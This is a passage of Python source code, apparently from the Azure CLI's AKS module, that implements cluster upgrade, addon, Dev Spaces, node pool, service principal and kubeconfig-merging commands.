"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
subnet_name=None, no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
tags=None,
labels=None,
mode="User",
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
node_vm_size = "Standard_D2s_v3"
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
mode=mode
)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
